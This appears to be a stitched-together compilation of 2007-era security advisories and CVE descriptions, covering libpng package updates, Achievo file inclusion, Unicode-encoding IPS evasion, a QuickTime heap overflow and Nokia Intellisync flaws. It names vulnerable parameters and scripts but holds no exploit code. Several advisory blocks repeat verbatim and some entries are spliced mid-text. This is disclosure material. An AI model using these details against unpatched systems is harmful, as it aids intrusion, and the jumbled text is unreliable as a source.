46fce5d27ac4b2dea9cf4deb633f824e http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_amd64.deb Size/MD5: 247528 68879285068cda170eef5a5f56594a1c i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_i386.udeb Size/MD5: 66932 12cafbea44a3e7cf109eb24cb47aa557 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_i386.deb Size/MD5: 111396 3a93335c2a072b2e2c94bc2cc0b3d77e http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_i386.deb Size/MD5: 239662 64029c30dac5152c97e1a0d864c981d0 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_powerpc.udeb Size/MD5: 66304 0cbf98391b6c3219f83cd24cefe0343c http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_powerpc.deb Size/MD5: 110828 62c7a8ccc58c86414bcd170c394f8240 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_powerpc.deb Size/MD5: 245220 1171c8638ec8ebc2c81f53706885b692 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_sparc.udeb Size/MD5: 63824 e66313895e489a36c2f438343fa3e0d4 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_sparc.deb Size/MD5: 108534 73ccb876f761c76b3518b8ca81e80485 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_sparc.deb Size/MD5: 240048 5b19c41bbc639ee717fdacd4d81533e1 Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.2.diff.gz Size/MD5: 16597 4ff19b636ab120a3fc4cee767171aa4f http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.2.dsc Size/MD5: 659 5769690df3c57a56d08aa8bf11013a42 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz Size/MD5: 510681 cac1512878fb98f2456df6dc50bc9bc7 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5.1ubuntu0.2_all.deb Size/MD5: 888 44f3267b52e89fc605f350b4fc347e45 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_amd64.udeb Size/MD5: 68992 105702504b783f464dff9ddd48de5ab0 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_amd64.deb Size/MD5: 113542 876f5c1a3a1f6b4bf828edcbabe0702e http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_amd64.deb Size/MD5: 247132 75d920fe60a5d4f356ccb43d8d5a98ed i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_i386.udeb Size/MD5: 69932 53783b0d13fd194f8cc9f19e1edc63d7 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_i386.deb Size/MD5: 114634 1b40abad309e133326ffdce859734610 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_i386.deb Size/MD5: 242882 3dca0a0938a43308465c8987f1357160 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_powerpc.udeb Size/MD5: 67606 088844733b580984e1a3b79001a27511 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_powerpc.deb Size/MD5: 112228 6024c0c9d455cfdaa8a38e89d6a53148 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_powerpc.deb Size/MD5: 246684 e45d2830ca5bdf0747ea0d436fafc20e sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_sparc.udeb Size/MD5: 64656 55d6e7740ec8a9eddcbbfdada56a5f63 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_sparc.deb Size/MD5: 109396 0b522137b1f4b2a34f990efc9dbd81df http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_sparc.deb Size/MD5: 241064 e679e908623c68c5865fbf2c24c46973 Updated packages for Ubuntu 7.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-1ubuntu1.diff.gz Size/MD5: 14344 16526f313e1ee650074edd742304ec53 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-1ubuntu1.dsc Size/MD5: 819 b28af76731dfe368e48dfcd554d7b583 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5.orig.tar.gz Size/MD5: 829038 77ca14fcee1f1f4daaaa28123bd0b22d Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.15~beta5-1ubuntu1_all.deb Size/MD5: 936 dcec28b3cf4b8ee22c6a1229fdbd2e84 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_amd64.udeb Size/MD5: 70656 b4fa5b37b54fee32dd7404c64b696192 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_amd64.deb Size/MD5: 189594 7e36d8e73bd47dbb19afd7cd0099335a http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_amd64.deb Size/MD5: 179950 c575d8c9699c971ec7682e52e37590b7 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_i386.udeb Size/MD5: 68246 c81ffc4cd0359a1ce1e73eb99d8608f6 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_i386.deb Size/MD5: 187234 09dcea1e3394a6d25565b23774d805db http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_i386.deb Size/MD5: 171520 ac3fb45b36ec32b1bac4734eef162c49 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_powerpc.udeb Size/MD5: 70652 147c89e36570990d5e084fc3a8933ed2 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_powerpc.deb Size/MD5: 189548 00b81b16632e789ab20bab04dbcd586c http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_powerpc.deb Size/MD5: 179128 61c51aafc326420b202c0f2ce6d5abfd sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_sparc.udeb Size/MD5: 66396 faff3d313cdc64f273eda1a5d01c2e0a http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_sparc.deb Size/MD5: 185312 249165d75936ab8cfc2fa1aef68a5ee6 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_sparc.deb Size/MD5: 173800 a40164cd4995c6ed795219157e6d598e . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ____________________________________________________________________________ Publisher Name: OpenPKG GmbH Publisher Home: http://openpkg.com/ Advisory Id (public): OpenPKG-SA-2007.013 Advisory Type: OpenPKG Security Advisory (SA) Advisory Directory: http://openpkg.com/go/OpenPKG-SA Advisory Document: http://openpkg.com/go/OpenPKG-SA-2007.013 Advisory Published: 2007-05-17 22:31 UTC Issue Id (internal): OpenPKG-SI-20070517.02 Issue First Created: 2007-05-17 Issue Last Modified: 2007-05-17 Issue Revision: 03 ____________________________________________________________________________ Subject Name: png Subject Summary: Portable Network Graphics (PNG) Image Format Library Subject Home: http://www.libpng.org/pub/png/libpng.html Subject Versions: * <= 1.2.16 Vulnerability Id: CVE-2007-2445 Vulnerability Scope: global (not OpenPKG specific) Attack Feasibility: run-time Attack Vector: remote network Attack Impact: denial of service Description: As confirmed by the vendor, a Denial of Service (DoS) vulnerability exists in the PNG [0] image format library libpng [1]. The bug is a NULL-pointer-dereference vulnerability involving palette images with a malformed "tRNS" PNG chunk, i.e., one with a bad CRC value. This bug can, at a minimum, cause crashes in applications simply by displaying a malformed image. References: [0] http://www.libpng.org/pub/png/ [1] http://www.libpng.org/pub/png/libpng.html [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2445 ____________________________________________________________________________ Primary Package Name: png Primary Package Home: http://openpkg.org/go/package/png Corrected Distribution: Corrected Branch: Corrected Package: OpenPKG Enterprise E1.0-SOLID ghostscript-8.54-E1.0.1 OpenPKG Enterprise E1.0-SOLID png-1.2.12-E1.0.2 OpenPKG Community CURRENT ghostscript-8.57-20070516 OpenPKG Community CURRENT png-1.2.18-20070516 ____________________________________________________________________________ For security reasons, this document was digitally signed with the OpenPGP public key of the OpenPKG GmbH (public key id 61B7AE34) which you can download from http://openpkg.com/openpkg.com.pgp or retrieve from the OpenPGP keyserver at hkp://pgp.openpkg.org/. Follow the instructions at http://openpkg.com/security/signatures/ for more details on how to verify the integrity of this document

PHP remote file inclusion vulnerability in index.php in Achievo 1.1.0 allows remote attackers to execute arbitrary PHP code via a URL in the config_atkroot parameter. Achievo is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. Achievo 1.1.0 is vulnerable to this issue; other versions may also be affected

formmail.php in Jetbox CMS 2.1 allows remote attackers to send arbitrary e-mails (spam) via modified recipient, _SETTINGS[allowed_email_hosts][], and subject parameters. Jetbox CMS is prone to an input-validation vulnerabilitiy because it fails to adequately sanitize user-supplied input. Attackers can exploit this issue to send spam email in the context of the application. Jetbox 2.1 is vulnerable; other versions may also be affected

The Cisco Intrusion Prevention System (IPS) and IOS with Firewall/IPS Feature Set do not properly handle certain full-width and half-width Unicode character encodings, which might allow remote attackers to evade detection of HTTP traffic. Various HTTP content scanning systems fail to properly scan full-width/half-width Unicode encoded traffic. This may allow malicious HTTP traffic to bypass content scanning systems. A third party may use this issue to attempt further attacks. Attackers may send this type of HTTP data to evade detection and perform further attacks. Cisco has stated that all IOS releases that support the Firewall/IPS feature set are affected. Although we currently have no definitive list of such versions, Symantec is investigating the matter and will update this BID's list of vulnerable systems appropriately. Resin is a WEB server developed by Caucho Technology, which can be used under Microsoft Windows operating system. There are multiple vulnerabilities in the implementation of Resin for Windows, and remote attackers may use this vulnerability to obtain sensitive information without authorization. Resin does not properly filter input delivered via URL, allowing a remote attacker to read a continuous stream of data from any COM or LPT device on the system by supplying a DOS device filename with an arbitrary extension in the URL, exfiltrating Web pages through directory traversal attacks The contents of files in the application's WEB-INF directory, or the full system path to the Caucho Resin server through URLs containing special characters. ---------------------------------------------------------------------- BETA test the new Secunia Personal Software Inspector! The Secunia PSI detects installed software on your computer and categorises it as either Insecure, End-of-Life, or Up-To-Date. Effectively enabling you to focus your attention on software installations where more secure versions are available from the vendors. Download the free PSI BETA from the Secunia website: https://psi.secunia.com/ ---------------------------------------------------------------------- TITLE: Novell iChain HTTP Unicode Encoding Detection Bypass SECUNIA ADVISORY ID: SA26692 VERIFY ADVISORY: http://secunia.com/advisories/26692/ CRITICAL: Less critical IMPACT: Security Bypass WHERE: >From remote SOFTWARE: Novell iChain 2.x http://secunia.com/product/1423/ DESCRIPTION: A vulnerability has been reported in Novell iChain, which can be exploited by malicious people to bypass certain security restrictions. SOLUTION: Apply iChain 2.3 SP5 Interim Release 3 or greater (2.3.408). PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: https://secure-support.novell.com/KanisaPlatform/Publishing/539/3193302_f.SAL_Public.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Full-width and half-width is an encoding technique for Unicode characters. Some Open Source or Microsoft Products such as Microsoft ISS and .NET Framework properly decode this type of encoding. Risk Level : High Impact : Security Bypass Systems Affected : Checkpoint Web Intelligence (Confirmed) IBM ISS Proventia Series (Confirmed) Full List of Vendors : (CERT - Vulnerability Note VU#739224) [1] Remedy : Contact your vendor for a hotfix, patch or advanced configuration. Credits : Fatih Ozavci (GamaTEAM Member) Caglar Cakici (GamaTEAM Member) It's detected using GamaSEC Exploit Framework GamaSEC Information Security Audit and Consulting Services (www.gamasec.net) Original Advisory Link : http://www.gamasec.net/english/gs07-01.html References : 1. CERT - Vulnerability Note VU#739224 http://www.kb.cert.org/vuls/id/739224 2. Unicode Home Page http://unicode.org 3. Unicode.org, Halfwidth and Fullwidth Forms http://www.unicode.org/charts/PDF/UFF00.pdf -- Best Regards Fatih Ozavci IT Security Consultant . ---------------------------------------------------------------------- 2003: 2,700 advisories published 2004: 3,100 advisories published 2005: 4,600 advisories published 2006: 5,300 advisories published How do you know which Secunia advisories are important to you? The Secunia Vulnerability Intelligence Solutions allows you to filter and structure all the information you need, so you can address issues effectively. The vulnerability is reported in versions prior to 4.0. SOLUTION: Update to version 4.0 or later. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. Join the FREE BETA test of the Network Software Inspector (NSI)! http://secunia.com/network_software_inspector/ The NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications

Stonesoft StoneGate IPS before 4.0 does not properly decode Fullwidth/Halfwidth Unicode encoded data, which makes it easier for remote attackers to scan or penetrate systems and avoid detection. This may allow malicious HTTP traffic to bypass content scanning systems. Attackers may send this type of HTTP data to evade detection and perform further attacks. Cisco has stated that all IOS releases that support the Firewall/IPS feature set are affected. Although we currently have no definitive list of such versions, Symantec is investigating the matter and will update this BID's list of vulnerable systems appropriately. ---------------------------------------------------------------------- BETA test the new Secunia Personal Software Inspector! The Secunia PSI detects installed software on your computer and categorises it as either Insecure, End-of-Life, or Up-To-Date. Effectively enabling you to focus your attention on software installations where more secure versions are available from the vendors. Download the free PSI BETA from the Secunia website: https://psi.secunia.com/ ---------------------------------------------------------------------- TITLE: Novell iChain HTTP Unicode Encoding Detection Bypass SECUNIA ADVISORY ID: SA26692 VERIFY ADVISORY: http://secunia.com/advisories/26692/ CRITICAL: Less critical IMPACT: Security Bypass WHERE: >From remote SOFTWARE: Novell iChain 2.x http://secunia.com/product/1423/ DESCRIPTION: A vulnerability has been reported in Novell iChain, which can be exploited by malicious people to bypass certain security restrictions. SOLUTION: Apply iChain 2.3 SP5 Interim Release 3 or greater (2.3.408). PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: https://secure-support.novell.com/KanisaPlatform/Publishing/539/3193302_f.SAL_Public.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Full-width and half-width is an encoding technique for Unicode characters. Some Open Source or Microsoft Products such as Microsoft ISS and .NET Framework properly decode this type of encoding. Risk Level : High Impact : Security Bypass Systems Affected : Checkpoint Web Intelligence (Confirmed) IBM ISS Proventia Series (Confirmed) Full List of Vendors : (CERT - Vulnerability Note VU#739224) [1] Remedy : Contact your vendor for a hotfix, patch or advanced configuration. Credits : Fatih Ozavci (GamaTEAM Member) Caglar Cakici (GamaTEAM Member) It's detected using GamaSEC Exploit Framework GamaSEC Information Security Audit and Consulting Services (www.gamasec.net) Original Advisory Link : http://www.gamasec.net/english/gs07-01.html References : 1. CERT - Vulnerability Note VU#739224 http://www.kb.cert.org/vuls/id/739224 2. Unicode Home Page http://unicode.org 3. Unicode.org, Halfwidth and Fullwidth Forms http://www.unicode.org/charts/PDF/UFF00.pdf -- Best Regards Fatih Ozavci IT Security Consultant . ---------------------------------------------------------------------- 2003: 2,700 advisories published 2004: 3,100 advisories published 2005: 4,600 advisories published 2006: 5,300 advisories published How do you know which Secunia advisories are important to you? The Secunia Vulnerability Intelligence Solutions allows you to filter and structure all the information you need, so you can address issues effectively. The vulnerability is reported in versions prior to 4.0. SOLUTION: Update to version 4.0 or later. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. Join the FREE BETA test of the Network Software Inspector (NSI)! http://secunia.com/network_software_inspector/ The NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications

Check Point Web Intelligence does not properly handle certain full-width and half-width Unicode character encodings, which might allow remote attackers to evade detection of HTTP traffic. Various HTTP content scanning systems fail to properly scan full-width/half-width Unicode encoded traffic. This may allow malicious HTTP traffic to bypass content scanning systems. Web Intelligence is prone to a remote security vulnerability. ---------------------------------------------------------------------- BETA test the new Secunia Personal Software Inspector! The Secunia PSI detects installed software on your computer and categorises it as either Insecure, End-of-Life, or Up-To-Date. Effectively enabling you to focus your attention on software installations where more secure versions are available from the vendors. Download the free PSI BETA from the Secunia website: https://psi.secunia.com/ ---------------------------------------------------------------------- TITLE: Novell iChain HTTP Unicode Encoding Detection Bypass SECUNIA ADVISORY ID: SA26692 VERIFY ADVISORY: http://secunia.com/advisories/26692/ CRITICAL: Less critical IMPACT: Security Bypass WHERE: >From remote SOFTWARE: Novell iChain 2.x http://secunia.com/product/1423/ DESCRIPTION: A vulnerability has been reported in Novell iChain, which can be exploited by malicious people to bypass certain security restrictions. SOLUTION: Apply iChain 2.3 SP5 Interim Release 3 or greater (2.3.408). PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: https://secure-support.novell.com/KanisaPlatform/Publishing/539/3193302_f.SAL_Public.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Full-width and half-width is an encoding technique for Unicode characters. Some Open Source or Microsoft Products such as Microsoft ISS and .NET Framework properly decode this type of encoding. Risk Level : High Impact : Security Bypass Systems Affected : Checkpoint Web Intelligence (Confirmed) IBM ISS Proventia Series (Confirmed) Full List of Vendors : (CERT - Vulnerability Note VU#739224) [1] Remedy : Contact your vendor for a hotfix, patch or advanced configuration. Credits : Fatih Ozavci (GamaTEAM Member) Caglar Cakici (GamaTEAM Member) It's detected using GamaSEC Exploit Framework GamaSEC Information Security Audit and Consulting Services (www.gamasec.net) Original Advisory Link : http://www.gamasec.net/english/gs07-01.html References : 1. CERT - Vulnerability Note VU#739224 http://www.kb.cert.org/vuls/id/739224 2. Unicode Home Page http://unicode.org 3. Unicode.org, Halfwidth and Fullwidth Forms http://www.unicode.org/charts/PDF/UFF00.pdf -- Best Regards Fatih Ozavci IT Security Consultant . ---------------------------------------------------------------------- 2003: 2,700 advisories published 2004: 3,100 advisories published 2005: 4,600 advisories published 2006: 5,300 advisories published How do you know which Secunia advisories are important to you? The Secunia Vulnerability Intelligence Solutions allows you to filter and structure all the information you need, so you can address issues effectively. The vulnerability is reported in versions prior to 4.0. SOLUTION: Update to version 4.0 or later. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. Join the FREE BETA test of the Network Software Inspector (NSI)! http://secunia.com/network_software_inspector/ The NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. The vulnerability affects the following products: * Cisco Intrusion Prevention System (IPS) * Cisco IOS with Firewall/IPS Feature Set SOLUTION: No fix or workaround is currently available

Buffer overflow in MIBEXTRA.EXE in Ipswitch WhatsUp Gold 11 allows attackers to cause a denial of service (application crash) or execute arbitrary code via a long MIB filename argument. NOTE: If there is not a common scenario under which MIBEXTRA.EXE is called with attacker-controlled command line arguments, then perhaps this issue should not be included in CVE. WhatsUp Gold is prone to a denial-of-service vulnerability

Heap-based buffer overflow in Apple QuickTime before 7.1.3 allows user-assisted remote attackers to execute arbitrary code via a crafted Sample Table Sample Descriptor (STSD) atom size in a QuickTime movie. Apple QuickTime is prone to a heap-based buffer-overflow issue because it fails to properly check boundaries on user-supplied data before copying it into an insuficiently sized memory buffer. An attacker may exploit this issue by enticing victims into opening a maliciously crafted 'MOV' QuickTime movie file. Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the user running the application. Failed exploit attempts likely result in denial-of-service conditions. Versions of QuickTime 7 prior to 7.1.3 are vulnerable. Apple QuickTime is a popular multimedia player that supports a wide variety of media formats. There is a heap overflow vulnerability in QuickTime when parsing malformed STSD elements. If an attacker specifies a malicious element size, a heap overflow may be triggered when parsing a MOV file, resulting in arbitrary instruction execution. TPTI-07-07: Apple QuickTime STSD Parsing Heap Overflow Vulnerability http://dvlabs.tippingpoint.com/advisory/TPTI-07-07 May 10, 2007 -- CVE ID: CVE-2007-0754 -- Affected Vendor: Apple -- Affected Products: QuickTime Player 7.x -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since January 31, 2006 by Digital Vaccine protection filter ID 4109. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of malformed Sample Table Sample Descriptor (STSD) atoms. Specifying a malicious atom size can result in an under allocated heap chunk and subsequently an exploitable heap corruption. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://docs.info.apple.com/article.html?artnum=304357 -- Disclosure Timeline: 2006.06.16 - Vulnerability reported to vendor 2006.01.31 - Digital Vaccine released to TippingPoint customers 2007.05.10 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Ganesh Devarajan, TippingPoint DVLabs

Nokia Intellisync Mobile Suite 6.4.31.2, 6.6.0.107, and 6.6.2.2, possibly involving Novell Groupwise Mobile Server and Nokia Intellisync Wireless Email Express, allows remote attackers to obtain user names and other sensitive information via a direct request to (1) usrmgr/userList.asp or (2) usrmgr/userStatusList.asp. Intellisync Mobile Suite is prone to a information disclosure vulnerability. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. Join the FREE BETA test of the Network Software Inspector (NSI)! http://secunia.com/network_software_inspector/ The NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. ---------------------------------------------------------------------- TITLE: Nokia Intellisync Mobile Suite Multiple Vulnerabilities SECUNIA ADVISORY ID: SA25212 VERIFY ADVISORY: http://secunia.com/advisories/25212/ CRITICAL: Moderately critical IMPACT: Cross Site Scripting, Exposure of system information, Exposure of sensitive information, DoS WHERE: >From remote SOFTWARE: Intellisync Mobile Suite http://secunia.com/product/3450/ DESCRIPTION: Johannes Greil has reported some vulnerabilities in Nokia's Intellisync Mobile Suite, which can be exploited by malicious people to gain knowledge of sensitive information, conduct cross-site scripting attacks, manipulate certain data, or cause a DoS (Denial of Service). 1) Missing authentication checks within certain ASP scripts (e.g. userList.asp, userStatusList.asp) can be exploited to modify or gain knowledge of certain user details, or to disable user accounts. 2) Certain input passed to de/pda/dev_logon.asp, usrmgr/registerAccount.asp, and de/create_account.asp is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. 3) An error within the bundled Apache Tomcat server can be exploited to disclose directory listings and script source codes. The vulnerabilities are reported in versions 6.4.31.2, 6.6.0.107, and 6.6.2.2 and is reported to partially affect Nokia Intellisync Wireless Email Express. Other versions may also be affected. SOLUTION: Upgrade to GMS 2. PROVIDED AND/OR DISCOVERED BY: Johannes Greil, SEC Consult ORIGINAL ADVISORY: http://www.sec-consult.com/289.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

usrmgr/userList.asp in Nokia Intellisync Mobile Suite 6.4.31.2, 6.6.0.107, and 6.6.2.2, possibly involving Novell Groupwise Mobile Server and Nokia Intellisync Wireless Email Express, allows remote attackers to modify user account details and cause a denial of service (account deactivation) via the userid parameter in an update action. Intellisync Mobile Suite is prone to a denial-of-service vulnerability. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. Join the FREE BETA test of the Network Software Inspector (NSI)! http://secunia.com/network_software_inspector/ The NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. ---------------------------------------------------------------------- TITLE: Nokia Intellisync Mobile Suite Multiple Vulnerabilities SECUNIA ADVISORY ID: SA25212 VERIFY ADVISORY: http://secunia.com/advisories/25212/ CRITICAL: Moderately critical IMPACT: Cross Site Scripting, Exposure of system information, Exposure of sensitive information, DoS WHERE: >From remote SOFTWARE: Intellisync Mobile Suite http://secunia.com/product/3450/ DESCRIPTION: Johannes Greil has reported some vulnerabilities in Nokia's Intellisync Mobile Suite, which can be exploited by malicious people to gain knowledge of sensitive information, conduct cross-site scripting attacks, manipulate certain data, or cause a DoS (Denial of Service). 1) Missing authentication checks within certain ASP scripts (e.g. userList.asp, userStatusList.asp) can be exploited to modify or gain knowledge of certain user details, or to disable user accounts. 2) Certain input passed to de/pda/dev_logon.asp, usrmgr/registerAccount.asp, and de/create_account.asp is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. 3) An error within the bundled Apache Tomcat server can be exploited to disclose directory listings and script source codes. The vulnerabilities are reported in versions 6.4.31.2, 6.6.0.107, and 6.6.2.2 and is reported to partially affect Nokia Intellisync Wireless Email Express. Other versions may also be affected. SOLUTION: Upgrade to GMS 2. PROVIDED AND/OR DISCOVERED BY: Johannes Greil, SEC Consult ORIGINAL ADVISORY: http://www.sec-consult.com/289.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

